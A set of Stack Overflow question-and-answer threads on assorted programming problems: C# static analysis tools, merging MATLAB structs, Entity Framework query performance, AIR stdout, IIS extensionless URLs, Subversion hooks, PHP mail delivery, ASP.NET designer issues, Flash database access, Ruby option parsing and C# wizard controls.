*Atomiq, based on source code, plenty of languages, cool "wheel" visualization
General Refactoring tools
*
*ReSharper - Majorly cool C# code analysis and refactoring features
A: *
*Gendarme is an open source rules based static analyzer (similar to FXCop, but finds a lot of different problems).
*Clone Detective is a nice plug-in for Visual Studio that finds duplicate code.
*Also speaking of Mono, I find the act of compiling with the Mono compiler (if your code is platform independent enough to do that, a goal you might want to strive for anyway) finds tons of unreferenced variables and other Warnings that Visual Studio completely misses (even with the warning level set to 4).
A: Have you seen CAT.NET?
From the blurb -
CAT.NET is a binary code analysis tool
that helps identify common variants of
certain prevailing vulnerabilities
that can give rise to common attack
vectors such as Cross-Site Scripting
(XSS), SQL Injection and XPath
Injection.
I used an early beta and it did seem to turn up a few things worth looking at.
A: I find the Code Metrics and Dependency Structure Matrix add-ins for Reflector very useful.
A: Aside from the excellent list by madgnome, I would add a duplicate code detector that is based off the command line (but is free):
http://sourceforge.net/projects/duplo/
A: Klocwork has a static analysis tool for C#: http://www.klocwork.com
A: Axivion Bauhaus Suite is a static analysis tool that works with C# (as well as C, C++ and Java).
It provides the following capabilities:
*
*Software Architecture Visualization (inlcuding dependencies)
*Enforcement of architectural rules e.g. layering, subsystems, calling rules
*Clone Detection - highlighting copy and pasted (and modified code)
*Dead Code Detection
*Cycle Detection
*Software Metrics
*Code Style Checks
These features can be run on a one-off basis or as part of a Continuous Integration process. Issues can be highlighted on a per project basis or per developer basis when the system is integrated with a source code control system.
A: Optimyth Software has just launched a static analysis service in the cloud, www.checkinginthecloud.com. Just securely upload your code, run the analysis and get the results. No hassles.
It supports several languages including C#. More info can be found at www.optimyth.com
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38635",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "174"
} |
Q: What are some efficient ways to combine two structures in MATLAB? I want to combine two structures with differing field names.
For example, starting with:
A.field1 = 1;
A.field2 = 'a';
B.field3 = 2;
B.field4 = 'b';
I would like to have:
C.field1 = 1;
C.field2 = 'a';
C.field3 = 2;
C.field4 = 'b';
Is there a more efficient way than using "fieldnames" and a for loop?
EDIT: Let's assume that in the case of field name conflicts we give preference to A.
A: I have found a nice solution on File Exchange: catstruct.
Without testing the performance I can say that it did exactly what I wanted.
It can deal with duplicate fields of course.
Here is how it works:
a.f1 = 1;
a.f2 = 2;
b.f2 = 3;
b.f4 = 4;
s = catstruct(a,b)
Will give
s =
f1: 1
f2: 3
f4: 4
A: I don't think you can handle conflicts well w/o a loop, nor do I think you'd need to avoid one. (although I suppose efficiency could be an issue w/ many many fields...)
I use a function I wrote a few years back called setdefaults.m, which combines one structure with the values of another structure, where one takes precedence over the other in case of conflict.
% SETDEFAULTS sets the default structure values
% SOUT = SETDEFAULTS(S, SDEF) reproduces in S
% all the structure fields, and their values, that exist in
% SDEF that do not exist in S.
% SOUT = SETDEFAULTS(S, SDEF, OVERRIDE) does
% the same function as above, but if OVERRIDE is 1,
% it copies all fields of SDEF to SOUT.
function sout = setdefaults(s,sdef,override)
if (not(exist('override','var')))
override = 0;
end
sout = s;
for f = fieldnames(sdef)'
cf = char(f);
if (override | not(isfield(sout,cf)))
sout = setfield(sout,cf,getfield(sdef,cf));
end
end
Now that I think about it, I'm pretty sure that the "override" input is unnecessary (you can just switch the order of the inputs) though I'm not 100% sure of that... so here's a simpler rewrite (setdefaults2.m):
% SETDEFAULTS2 sets the default structure values
% SOUT = SETDEFAULTS(S, SDEF) reproduces in S
% all the structure fields, and their values, that exist in
% SDEF that do not exist in S.
function sout = setdefaults2(s,sdef)
sout = sdef;
for f = fieldnames(s)'
sout = setfield(sout,f{1},getfield(s,f{1}));
end
and some samples to test it:
>> S1 = struct('a',1,'b',2,'c',3);
>> S2 = struct('b',4,'c',5,'d',6);
>> setdefaults2(S1,S2)
ans =
b: 2
c: 3
d: 6
a: 1
>> setdefaults2(S2,S1)
ans =
a: 1
b: 4
c: 5
d: 6
A: In C, a struct can have another struct as one of its members. While this isn't exactly the same as what you're asking, you could end up either with a situation where one struct contains another, or one struct contains two structs, both of which hold parts of the info that you wanted.
pseudocode: I don't remember the actual syntax.
A.field1 = 1;
A.field2 = 'a';
A.field3 = struct B;
to access:
A.field3.field4;
or something of the sort.
Or you could have struct C hold both an A and a B:
C.A = struct A;
C.B = struct B;
with access then something like
C.A.field1;
C.A.field2;
C.B.field3;
C.B.field4;
hope this helps!
EDIT: both of these solutions avoid naming collisions.
Also, I didn't see your matlab tag. By convention, you may want to edit the question to include that piece of info.
A: Without collisions, you can do
M = [fieldnames(A)' fieldnames(B)'; struct2cell(A)' struct2cell(B)'];
C=struct(M{:});
And this is reasonably efficient. However, struct errors on duplicate fieldnames, and pre-checking for them using unique kills performance to the point that a loop is better. But here's what it would look like:
M = [fieldnames(A)' fieldnames(B)'; struct2cell(A)' struct2cell(B)'];
[tmp, rows] = unique(M(1,:), 'last');
M=M(:, rows);
C=struct(M{:});
You might be able to make a hybrid solution by assuming no conflicts and using a try/catch around the call to struct to gracefully degrade to the conflict handling case.
A: Short answer: setstructfields (if you have the Signal Processing Toolbox).
The official solution is posted by Loren Shure on her MathWorks blog, and demonstrated by SCFrench here and in Eitan T's answer to a different question. However, if you have the Signal Processing Toolbox, a simple undocumented function does this already - setstructfields.
help setstructfields
setstructfields Set fields of a structure using another structure
setstructfields(STRUCTIN, NEWFIELDS) Set fields of STRUCTIN using
another structure NEWFIELDS fields. If fields exist in STRUCTIN
but not in NEWFIELDS, they will not be changed.
Internally it uses fieldnames and a for loop, so it is a convenience function with error checking and recursion for fields that are themselves structs.
Example
The "original" struct:
% struct with fields 'color' and 'count'
s = struct('color','orange','count',2)
s =
color: 'orange'
count: 2
A second struct containing a new value for 'count', and a new field, 'shape':
% struct with fields 'count' and 'shape'
s2 = struct('count',4,'shape','round')
s2 =
count: 4
shape: 'round'
Calling setstructfields:
>> s = setstructfields(s,s2)
s =
color: 'orange'
count: 4
shape: 'round'
The field 'count' is updated. The field 'shape' is added. The field 'color' remains unchanged.
NOTE: Since the function is undocumented, it may change or be removed at any time.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38645",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |
Q: Performance of Linq to Entities vs ESQL When using the Entity Framework, does ESQL perform better than Linq to Entities?
I'd prefer to use Linq to Entities (mainly because of the strong-type checking), but some of my other team members are citing performance as a reason to use ESQL. I would like to get a full idea of the pro's/con's of using either method.
A: ESQL can also generate some particularly vicious SQL. I had to track down a problem with such a query that was using inherited classes, and I found out that my piddly little ESQL of 4 lines got translated into a 100,000-character monster SQL statement.
Did the same thing with Linq and the compiled code was much more manageable, let's say 20 lines of SQL.
Plus, as other people mentioned, Linq is strongly typed, although very annoying to debug without the edit and continue feature.
AD
A: Entity-SQL (eSQL) allows you to do things such as dynamic queries more easily than LINQ to Entities. However, if you don't have a scenario that requires eSQL, I would be hesitant to rely on it over LINQ because it will be much harder to maintain (e.g. no more compile-time checking, etc).
I believe LINQ allows you to precompile your queries as well, which might give you better performance. Rico Mariani blogged about LINQ performance a while back and discusses compiled queries.
A: nice graph showing performance comparisons here:
Entity Framework Performance Explored
not much difference seen between ESQL and Entities
but overall differences significant in using Entities over direct Queries
Entity Framework uses two layers of object mapping (compared to a single layer in LINQ to SQL), and the additional mapping has performance costs. At least in EF version 1, application designers should choose Entity Framework only if the modeling and ORM mapping capabilities can justify that cost.
A: The most obvious differences are:
Linq to Entities is strongly typed code including nice query comprehension syntax. The fact that the “from” comes before the “select” allows IntelliSense to help you.
Entity SQL uses traditional string based queries with a more familiar SQL like syntax where the SELECT statement comes before the FROM. Because eSQL is string based, dynamic queries may be composed in a traditional way at run time using string manipulation.
The less obvious key difference is:
Linq to Entities allows you to change the shape or "project" the results of your query into any shape you require with the “select new{... }” syntax. Anonymous types, new to C# 3.0, has allowed this.
Projection is not possible using Entity SQL as you must always return an ObjectQuery<T>. In some scenarios it is possible use ObjectQuery<object> however you must work around the fact that .Select always returns ObjectQuery<DbDataRecord>. See code below...
ObjectQuery<DbDataRecord> query = DynamicQuery(context,
"Products",
"it.ProductName = 'Chai'",
"it.ProductName, it.QuantityPerUnit");
public static ObjectQuery<DbDataRecord> DynamicQuery(MyContext context, string root, string selection, string projection)
{
ObjectQuery<object> rootQuery = context.CreateQuery<object>(root);
ObjectQuery<object> filteredQuery = rootQuery.Where(selection);
ObjectQuery<DbDataRecord> result = filteredQuery.Select(projection);
return result;
}
There are other more subtle differences described by one of the team members in detail here and here.
A: For me, the amount of code you can cover with compile-time checking is something I'd place a higher premium on than performance. Having said that, at this stage I'd probably lean towards ESQL, not just because of the performance, but because it's also (at present) a lot more flexible in what it can do. There's nothing worse than using a technology stack that doesn't have a feature you really really need.
The entity framework doesn't support things like custom properties, custom queries (for when you need to really tune performance) and does not function the same as linq-to-sql (i.e. there are features that simply don't work in the entity framework).
My personal impression of the Entity Framework is that there is a lot of potential, but it's probably a bit too "rigid" in its implementation to use in a production environment in its current state.
A: For direct queries I'm using linq to entities, for dynamic queries I'm using ESQL. Maybe the answer isn't either/or, but and/also.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38647",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Any way to have an ActionScript 3 (Flex/AIR) project print to standard output? Is there any way to have a binary compiled from an ActionScript 3 project print stuff to stdout when executed?
From what I've gathered, people have been going around this limitation by writing hacks that rely on local socket connections and AIR apps that write to files in the local filesystem, but that's pretty much it -- it's obviously not possible with the Flash Player and AIR runtimes from Adobe.
Is there any project (e.g. based on the Tamarin code) that is attempting to implement something that would provide this kind of functionality?
A: With AIR on Linux, it is easy to write to stdout, since the process can see its own file descriptors as files in /dev.
For stdout, open /dev/fd/1 or /dev/stdout as a FileStream, then write to that.
Example:
var stdout : FileStream = new FileStream();
stdout.open(new File("/dev/fd/1"), FileMode.WRITE);
stdout.writeUTFBytes("test\n");
stdout.close();
Note: See this answer for the difference between writeUTF() and writeUTFBytes() - the latter will avoid garbled output on stdout.
A: As you say, there's no Adobe-created way to do this, but you might have better luck with Zinc; it is similar to AIR but provides real OS integration of Flash-based applications. Look through the API docs, there should be something there.
A: If you are using a debug Flash Player, you can have the Flash Player log trace messages to a file on your system.
If you want real time messages, then you could tail the file.
More info:
http://blog.flexexamples.com/2007/08/26/debugging-flex-applications-with-mmcfg-and-flashlogtxt/
mike chambers
[email protected]
A: Redtamarin seems to be able to do this (even though it's still in its infancy):
Contents of test.as:
import avmplus.System;
import redtamarin.version;
trace( "hello world" );
trace( "avmplus v" + System.getAvmplusVersion() );
trace( "redtamarin v" + redtamarin.version );
On the command line:
$ ./buildEXE.sh test.as
test.abc, 243 bytes written
test.exe, 2191963 bytes written
test.abc, 243 bytes written
test.exe, 2178811 bytes written
$ ./test
hello world
avmplus v1.0 cyclone (redshell)
redtamarin v0.1.0.92
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38651",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Automatically floating all fields in a VFP report? I want to set all the fields and labels on a VFP7 report to Float and Stretch with overflow. I tried using the .frx file and doing the following REPLACE but it didn't work.
Is there some other field I need to change too?
REPLACE float WITH .T. FOR objtype = 8
A: It turns out you have to set top to .F. for float to take effect, this worked:
USE report.frx
REPLACE float with .T., stretch with .T., top with .F. for objtype = 8
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38654",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Can IIS 6 serve requests for pages with no extensions? Is there any way in IIS to map requests for a particular URL with no extension to a given application?
For example, in trying to port something from a Java servlet, you might have a URL like this...
http://[server]/MyApp/HomePage?some=parameter
Ideally I'd like to be able to map everything under MyApp to a particular application, but failing that, any suggestions about how to achieve the same effect would be really helpful.
A: You can also create an ISAPI filter that re-writes urls. The user enters a url with no extension, but the filter will interpret the request so that it does. Note that in IIS it's real easy to screw this up, so you might want to find a pre-written one. I haven't used any myself so I can't recommend a specific product that's any different than what you'd find via google, especially as I don't know your specific use case. But at least now you know what to search for.
You can also rewrite your urls using ASP.Net:
http://msdn.microsoft.com/en-us/library/ms972974.aspx
A: You can set IIS6 to handle all requests, but the key to handling files without extensions is to tell IIS not to look for the file.
http://weblogs.asp.net/scottgu/archive/2007/03/04/tip-trick-integrating-asp-net-security-with-classic-asp-and-non-asp-net-urls.aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38661",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Can you modify text files when committing to subversion? I want to run the following script on text files that are being committed:
# Send the commands H and w to ed
# ed will append newline if the file does not end in one
printf "%s\n" H w | ed -s $1
# Strip trailing whitespace
sed -i 's/[ \t]*$//g' $1
# Convert tabs to 4 spaces
sed -i -r "s/\t/ /g" $1
I see subversion has a start-commit and pre-commit hooks but I can't follow the documentation about how I could process the text files with the above script.
A: You mean change the text file before it's committed? You can (I'm not sure how), but it's generally not a good idea, as it doesn't tell the client about the change, so the local copies become void on a commit.
What I would do is block the commit (non zero exit), and give an error message as to why you don't want that revision to go through.
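If you take the blocking route, here is a rough pre-commit hook sketch in Python (my own illustration, not from the answer; it assumes svnlook is on the PATH and rejects offending files rather than rewriting them):
#!/usr/bin/env python
# pre-commit hook: Subversion passes REPOS and TXN as arguments
import subprocess
import sys

repos, txn = sys.argv[1], sys.argv[2]

def svnlook(subcommand, *extra):
    cmd = ['svnlook', subcommand, '-t', txn, repos] + list(extra)
    return subprocess.check_output(cmd).decode('utf-8', 'replace')

bad = []
for line in svnlook('changed').splitlines():
    status, path = line[:4].strip(), line[4:]
    if status in ('A', 'U', 'UU') and not path.endswith('/'):
        content = svnlook('cat', path)
        if '\t' in content or any(l != l.rstrip() for l in content.splitlines()):
            bad.append(path)

if bad:
    sys.stderr.write('Tabs or trailing whitespace found in:\n' + '\n'.join(bad) + '\n')
    sys.exit(1)  # non-zero exit blocks the commit; the message reaches the client
sys.exit(0)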
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38664",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Does the PHP mail() function work if I don't own the MX record I'm not sure I'm using all the correct terminology here so be forgiving.
I just put up a site with a contact form that sends an email using the PHP mail() function. Simple enough. However the live site doesn't actually send the email, the test site does. So it's not my code.
It's a shared host and we have another site that has the same function that works perfectly, so it's not the server.
The only difference between the two is that the site that doesn't work just has the name server pointing to us and so the MX record never touches our server.
So my question is, could someone please confirm that the mail() function won't work if we don't have the MX record pointing to our server. Thanks
A: Yes. It will work just fine. I have a PHP script using the mail() function with the MX records set to Google Apps.
If the two scripts are on different hosts (it's a bit unclear from your post), then make sure that the host doesn't block some of the custom headers. I had issues with this when creating my script, but removing all but the From header fixed the problem.
A: Some hosts (Godaddy is the worst) block your use of sendmail and mail().
I generally use smtp to send emails from my php applications and with PHPMailer it's super easy. Many applications are using older versions of PHPMailer and sometimes updating it can help. It's also easy enough to add quickly to short scripts as well.
A: Hey guys thanks for the answers, it is really appreciated.
After ignoring the issue for a few months it has come up again; I did, however, find the answer to my problems.
Firstly, as your answers suggested, PHP and the mail() function were working as expected. The mail was getting sent.
The problem arises when the email is sent: the server simply presumes that, because it is being sent from mydomain.com to an *@mydomain.com address, the mailbox is hosted on the same server, so it delivers the email locally and ignores the MX record.
OK, it's a bit more complicated than that, but that is the general gist.
Edit:
Found a better version of the topic sendmail and MX records when mail server is not on web host.
A: The mail() function sends mail from the server hosting the script. Since many shared hosting providers host separate mail servers, and because the mail() function doesn't support any sort of authentication, many shared hosting providers block it.
A: If the site uses SPF, remember to include the sending site in your SPF record. For more info see here.
A: Yes, you could put in what ever you want in the 'from' field and it would still work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38669",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: ASP.NET controls cannot be referenced in code-behind in Visual Studio 2008 Ok, so, my visual studio is broken. I say this NOT prematurely, as it was my first response to see where I had messed up in my code. When I add controls to the page I can't reference all of them in the code behind. Some of them I can, it seems that the first few I put on a page work, then it just stops.
I first thought it may be the type of control as initially I was trying to reference a repeater inside an update panel. I know I am correctly referencing the code behind in my aspx page. But just in case it was a screw up on my part I started to recreate the page from scratch and this time got a few more controls down before VS stopped recognizing my controls.
After creating my page twice and getting stuck I thought maybe it was still the type of controls. I created a new page and just threw some labels on it. No dice, build fails when referencing the control from the code behind.
On a possibly unrelated note, when I switch to the dreaded "design" mode of the aspx pages, VS 2008 errors out and restarts.
I have already put a trouble ticket in to Microsoft. I uninstalled all add-ins, I reinstalled visual studio.
Anyone that wants to see my code just ask, but I am using the straight WYSIWYG visual studio "new aspx page" nothing fancy.
I doubt anyone has run into this, but have you?
Has anyone had success trouble shooting these things with Microsoft? Any way to expedite this ticket without paying??? I have been talking to a rep from Microsoft for days with no luck yet and I am dead in the water.
Jon Limjap: I edited the title to both make it clear and descriptive and make sure that nobody sees it as offensive. "Foo-barred" doesn't exactly constitute a proper question title, although your question is clearly a valid one.
A: In my case, I was working with some old web site code, which I converted to a VS2008 solution. I encountered this same problem.
For me, the fix was to right-click the Web Sites project in the Solution Explorer and select Convert to Web Application. This created designer.cs files for all pages, which did not yet have these files before.
A: The above fix (deleting the temp files) did not work for me. I had to delete the PageName.aspx.designer.cs file, then right-click my page, and choose "Convert to Web Application" from the context menu.
When Visual Studio attempted to rebuild the designer file, it encountered (and revealed to me) the source of the problem. In my case, VS had lost a reference to a DLL needed by one of the controls on my page, so I had to clean out the generated bin folders in my project.
A: you will also find .net temp files which are safe to delete here:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files
A: I observed this happens because of a missing .designer.cs file. The following fixed this issue in my case (basically I had these files copied from a VS 2005 web project to a VS 2010 project): right-click the .aspx file and select the "Convert to Web Application" menu item; this will create the .designer.cs file and then it should work fine.
A: In my case new asp controls I added to an existing page were not being detected.
What worked for me was forcing a recompile by renaming an existing control to break the build eg: changing <asp:TextBox ID="txtTitle" runat="server" /> to <asp:TextBox ID="txtTitle2" runat="server" />
When I corrected the ID and rebuilt a new designer file was generated with the corrected ID and new controls.
A: try clearing your local VS cache. find your project and delete the folder. the folder is created by VS for what reason I honestly don't understand. but I've had several occasions where clearing it and doing a re-build fixes things... hope this is all that you need as well.
here
%Temp%\VWDWebCache
and possibly here
%LocalAppData%\Microsoft\WebsiteCache
A: Is the control that you are trying to reference inside of the repeater?
If so then you need to look them up using the FindControl method.
For example for:
<asp:Repeater ID="Repeater1" runat="server">
<ItemTemplate>
<asp:LinkButton ID="LinkButton1" runat="server">stest</asp:LinkButton>
</ItemTemplate>
</asp:Repeater>
You would need to do this to reference it:
LinkButton lb = (LinkButton)Repeater1.FindControl("LinkButton1");
A: right click on project name and select "Clean". then, check your bin folder if it has any dll remaining. if so, delete it. that´s it. just rebuild and every thing will work fine.
A: This can also happen if the Inherits property on the source page doesn't match the class name in the code behind. Generally speaking, this would probably only happen if you copy/pasted a .ascx/.aspx file and forgot to update it.
Example:
<%@ Control AutoEventWireup="false" CodeBehind="myControl.ascx.vb" Inherits="myProject.myWrongControl" %>
The the code behind class:
Partial Public Class myControl
A: We cannot change the code while the application is running. To do so, first click the stop button at the top, which will halt your application. Now click the button in design mode; it will insert the code into the .aspx.cs file, and then you can write the code in it.
A: For me, deleting/renaming the files in the following location worked:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\myvirtualwebsite\e331e0a9
A: Check out your aspx file on errors, once I've faced with that problem
A: I had this happen a few times and it happened again today for a new reason. I normally run my project through IIS but needed to run it locally to debug. I normally run on port 80 in IIS and 81 in debug, but I had some settings in the web.config that used 80 so I just killed the site in IIS and switched the website to port 80 in the project settings. For whatever reason, this messed everything up and created the problem described in the OP. I started trying things one by one, including all the advice mentioned here, but switching the port back to 81 in the project settings is what ended up working.
A: Just to add my two cents with this problem.
The only thing from all the above that worked for me was the "Clean" and then delete anything left in the bin folder. Rebuild and all controls started working then.
A: FYI...I was having this problem too and I ended up fixing it by deleting the existing .designer.vb file, right-clicking on the project and choosing Convert to Web Application. It then showed the real "error" that was causing the GUI to crap itself. Turned out I had used the same name for 2 other labels but that wasn't being shown in the error list window. Once I renamed one of the 2 other labels it built fine and stopped giving me trouble.
A: You have to add
runat="server"
to each element in your page.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38670",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "32"
} |
Q: Does Adobe Flash support databases? Which databases does Adobe Flash support, if any?
A: None.
Instead, you would need to create some middleware (say, a webservice) that you talked to that did the database CRUD for you.
A: None, really.
As others have said, the best solution is to have something in between. I personally prefer amfphp for larger datasets and plain xml for smaller stuff, especially since they introduced E4X (way better XML handling) in ActionScript 3.
However, since Flash can do socket communication, it is possible to talk directly to a server. This is very fast, but you're basically opening up your database to the world.
I've never used any of these, but the major ones seem to be asql and assql.
Also, flash running in Adobe AIR has support for sqlite databases.
A: Agree with @SCdF, create a service in php or any other language that takes a modified query from flash, executes it and returns the DB response. Make sure that it only takes a connection from its own local IP address or something like that to prevent "unintentional use".
A: You should look at this article. Also you could look into Flex Data Services. Usually Flex is more suited for application that need a lot of access to data, but for simple things in flash you should use some Xml data sources, and write the xml source yourself in something like php, asp, python, perl etc.. like others have pointed out.
A: @SCdF is correct. From the horse's mouth:
A Macromedia Flash movie cannot
communicate directly with a database.
However, Macromedia Flash movies can
"talk" to server-side applications
(also referred to as "middleware").
Middleware can query a database and
relay data back and forth. There are
many server applications available.
Some of the most common are CGI, ASP,
PHP, ColdFusion and Tango.
A: What about Blaze DS (which used to be Flex Data Services) and LiveCycle Data Services?
A: Zend AMF is a beast! From the creator of AMFPHP, but Zend AMF is supported by both Adobe and Zend. While AMFPHP is a bit more robust, the creator (Wade Arnold) of it seems to be focused on Zend AMF and it is becoming much better.
If you want something more enterprise level I would advise using Blaze DS or LiveCycle as suggested by prochaine.
A: If you want to go the nosql route, there is an opensource actionscript library for communicating with CouchDb: http://code.google.com/p/as3relax/
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38674",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How to provide next page of updated content? Feel free to edit the title if you know how to formulate the question better. (Tagging is a problem as well.) The problem may be too difficult in this general form, so let us consider a concrete example.
You get a screenful of stackoverflow questions by requesting the /questions?sort=newest page. The next page link leads to /questions?page=2&sort=newest. I suppose that at the server side, the request is translated into an SQL query with a LIMIT clause. The problem with this approach is that if new questions were added while the user browses the first page, his second page will start with some questions he already saw. (If he has 10 questions per page, and 10 new questions happened to be added, he'll get exactly the same content the second time!)
Is there an elegant way to solve this common problem? I realize that it is not that big a problem, at least not for stackoverflow, but still.
The best idea I have (apart from storing request history per client) is to use a /questions?answer_id=NNN format. The server returns a page that starts with the requested answer, and puts the id of the first answer on the next page into the next-page link. There must be a way to write SQL for that, right?
Is this how it's usually done? Or is there a better way?
A: This can't be done in an easy way. For instance, the "Unanswered" list here at stackoverflow is sorted by number of votes. So if you'd save the last ID of the page you're viewing (in a cookie, request, session, wherever) and someone upvotes a post while you're browsing page 2, page 3 isn't complete since the recently upvoted post could have been moved to page 1 or 2.
The only way to do it is to load the complete list in someone's session. Please don't...
As already mentioned, let's hope people are used to this by now.
A: Most web sites I've seen don't solve this problem - they show you a page including some content you've already seen.
You might consider that a feature - when you click "next" and see some content you're seen before, it's a signal that you want to go back to the front again because there's some new content.
A: Tag each question with its time entered into the database, carry the time the frontpage was last loaded as a cookie or part of the URL, and limit the search to items n through n+displaynum as you go forward.
But I wouldn't bother. This behavior is uniform enough that most users expect it, and it serves as a flag for when new data is becoming available. You can even open a new tab/window that starts back at the top of the list to see what has come up.
A: I believe the SQL (for MySQL) would be:
SELECT *
FROM entries
WHERE entry_id >= @last_viewed_entry_id
ORDER BY entry_id
LIMIT 50
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38680",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: How to grab the contents of HTML tags? Hey so what I want to do is snag the content for the first paragraph. The string $blog_post contains a lot of paragraphs in the following format:
<p>Paragraph 1</p><p>Paragraph 2</p><p>Paragraph 3</p>
The problem I'm running into is that I am writing a regex to grab everything between the first <p> tag and the first closing </p> tag. However, it is grabbing the first <p> tag and the last closing </p> tag which results in me grabbing everything.
Here is my current code:
if (preg_match("/[\\s]*<p>[\\s]*(?<firstparagraph>[\\s\\S]+)[\\s]*<\\/p>[\\s\\S]*/",$blog_post,$blog_paragraph))
echo "<p>" . $blog_paragraph["firstparagraph"] . "</p>";
else
echo $blog_post;
A: If you use preg_match, use the "U" flag to make it un-greedy.
preg_match("/<p>(.*)<\/p>/U", $blog_post, $matches);
$matches[1] will then contain the first paragraph.
A: Well, sysrqb will let you match anything in the first paragraph assuming there's no other html in the paragraph. You might want something more like this
<p>.*?</p>
Placing the ? after your * makes it non-greedy, meaning it will only match as little text as necessary before matching the </p>.
A: It would probably be easier and faster to use strpos() to find the position of the first
<p>
and first
</p>
then use substr() to extract the paragraph.
$paragraph_start = strpos($blog_post, '<p>');
$paragraph_end = strpos($blog_post, '</p>', $paragraph_start);
$paragraph = substr($blog_post, $paragraph_start + strlen('<p>'), $paragraph_end - $paragraph_start - strlen('<p>'));
Edit: Actually the regex in others' answers will be easier and faster... your big complex regex in the question confused me...
A: Using Regular Expressions for html parsing is never the right solution. You should be using XPATH for this particular case:
$string = <<<XML
<a>
<b>
<c>texto</c>
<c>cosas</c>
</b>
<d>
<c>código</c>
</d>
</a>
XML;
$xml = new SimpleXMLElement($string);
/* Select the first <p> element */
$resultado = $xml->xpath('//p[1]');
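For the HTML in the original question, a rough sketch using DOMDocument (also part of the standard PHP distribution) would look like this; unlike SimpleXMLElement, loadHTML tolerates non-XML markup, and note that textContent strips any inline tags inside the paragraph:
$doc = new DOMDocument();
$doc->loadHTML($blog_post);                      // wraps the fragment in html/body for you
$paragraphs = $doc->getElementsByTagName('p');
if ($paragraphs->length > 0) {
    echo "<p>" . $paragraphs->item(0)->textContent . "</p>";
} else {
    echo $blog_post;
}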
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38691",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: ruby idioms for using command-line options I'm trying to pick up ruby by porting a medium-sized (non-OO) perl program. One of my personal idioms is to set options like this:
use Getopt::Std;
our $opt_v; # be verbose
getopts('v');
# and later ...
$opt_v && print "something interesting\n";
In perl, I kind of grit my teeth and let $opt_v be (effectively) a global.
In ruby, the more-or-less exact equivalent would be
require 'optparse'
OptionParser.new do |opts|
  opts.on("-v", "--[no-]verbose", TrueClass, "Run verbosely") { |v| $opt_verbose = v }
end.parse!
where $opt_verbose is a global that classes could access. Having classes know about global flags like that seems ... er ... wrong. What's the OO-idiomatic way of doing this?
*
*Let the main routine take care of all option-related stuff and have the classes just return things to it that it decides how to deal with?
*Have classes implement optional behaviour (e.g., know how to be verbose) and set a mode via an attr_writer sort of thing?
updated: Thanks for the answers suggesting optparse, but I should have been clearer that it's not how to process command-line options I'm asking about, but more the relationship between command-line options that effectively set a global program state and classes that should ideally be independent of that sort of thing.
A: A while back I ran across this blog post (by Todd Werth) which presented a rather lengthy skeleton for command-line scripts in Ruby. His skeleton uses a hybrid approach in which the application code is encapsulated in an application class which is instantiated, then executed by calling a "run" method on the application object. This allowed the options to be stored in a class-wide instance variable so that all methods in the application object can access them without exposing them to any other objects that might be used in the script.
I would lean toward using this technique, where the options are contained in one object and use either attr_writers or option parameters on method calls to pass relevant options to any additional objects. This way, any code contained in external classes can be isolated from the options themselves -- no need to worry about the naming of the variables in the main routine from within the thingy class if your options are set with a thingy.verbose=true attr_writer or thingy.process(true) call.
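A stripped-down sketch of that idea (class and option names here are made up for illustration, not taken from Todd Werth's actual skeleton):
require 'optparse'

class App
  def initialize(argv)
    @options = { :verbose => false }
    OptionParser.new do |opts|
      opts.on("-v", "--[no-]verbose", "Run verbosely") { |v| @options[:verbose] = v }
    end.parse!(argv)
  end

  def run
    puts "something interesting" if @options[:verbose]
    # hand only what is needed to collaborators, e.g. Thingy.new(:verbose => @options[:verbose])
  end
end

App.new(ARGV).run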
A: The optparse library is part of the standard distribution, so you'll be able to use it without requiring any third party stuff.
I haven't used it personally, but rails seems to use it extensively and so does rspec, which I guess is a pretty solid vote of confidence
This example from rails' script/console seems to show how to use it pretty easily and nicely
A: The first hit on google for "processing command line options in ruby" is an article about Trollop which seems to be a good tool for this job.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: What is the best way to create a wizard in C# 2.0? I have a winforms application where users will be creating stock items, and at the time of creation there are a number of different things that need to happen.
I think the UI for this should probably be a wizard of some kind, but I'm unsure as to the best way to achieve this. I have seen a couple of 3rd party Wizard controls, and I have also seen manual implementations of making panels visible/invisible.
What are the best ways that people have used in the past, that are easy to implement, and also make it easy to add "pages" to the wizard later on if needed?
A: I know this answer has already been accepted, but I just found a better Wizard control that's free, and of course, since it's on CodeProject, includes the source, so you can modify it if it's not exactly what you want. I'm adding this as an answer for the next person to stumble across this question looking for a good Wizard control.
http://www.codeproject.com/KB/miscctrl/DesignTimeWizard.aspx
A: Here are a few more resources you should check out:
*
*This DevExpress WinForms control: http://www.devexpress.com/Products/NET/Controls/WinForms/Wizard/
*A home-grown wizards framework: http://weblogs.asp.net/justin_rogers/articles/60155.aspx
